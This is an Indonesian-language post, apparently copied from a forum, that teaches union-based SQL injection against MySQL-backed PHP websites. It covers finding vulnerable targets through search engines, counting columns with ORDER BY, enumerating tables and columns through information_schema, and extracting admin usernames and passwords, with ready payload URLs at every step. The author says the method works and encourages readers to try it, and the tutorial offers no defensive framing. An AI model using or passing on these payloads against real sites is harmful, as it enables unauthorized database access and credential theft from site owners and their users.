SQL injection adalah teknik hacking yang memanfaatkan bug dalam website yang biasanya menggunakan PHP atau ASP. tutorial kali ini saya salin dari kaskus. silakan disimak gan..
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
Langkah Pertama
carilah target di gogel banyak tuh..
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
Langkah Kedua
mencari dan menghitung jumlah table yang ada dalam databasenya..
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1--
ceklah secara step by step (satupersatu)...
misal:
[site]/news.php?id=-100+order+by+1--
[site]/news.php?id=-100+order+by+2--
[site]/news.php?id=-100+order+by+3--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+20--
berarti yang kita ambil adalah sampai angka 19
menjadi [site]/berita.php?id=-100+order+by+19--
Langkah Tiga
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2 ,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2 ,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2 ,3,4,@@version,6,7,8--
ingat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_sch ema..
untuk versi 5 berarti kita beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_sch ema..
Langkah Ke empat
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_sc hema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2 ,3,4,table_name,6,7, 8+from+information_s chema.tables--
seumpama table yang muncul adalah "admin"
Langkah kelima
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_n ame) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_sc hema.tables+where+ta ble_schema=database( ) >> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2 ,3,4,group_concat(ta ble_name),6,7,8+from +information_schema. tables+where+table_s chema=database()--
Langkah ke enam..
perintah group_concat(column_ name) >> dimasukan pada angka yg keluar tadi
perintah +from+information_sc hema.columns+where+t able_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2 ,3,4,group_concat(co lumn_name),6,7,8+fro m+information_schema .columns+where+tabl e_name=0xhexa--
pada tahap ini kita wajib untuk meng convert text to hex kata pada isi table menjadi hexadecimal
website yg digunakan untuk konversi :
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2 ,3,4,group_concat(co lumn_name),6,7,8+fro m+information_schema .columns+where+tabl e_name=0x61646D696E--
Langkah ke tujuuh..
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2 ,3,4,concat_ws(0x3a, hasil isi column),6,7,8+from+( nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2 ,3,4,concat_ws(0x3a, id,username,password ),6,7,8+from+admin--
cara ini sudah saya coba dan berhasil. silakan coba dan gunakan dengan bijak :)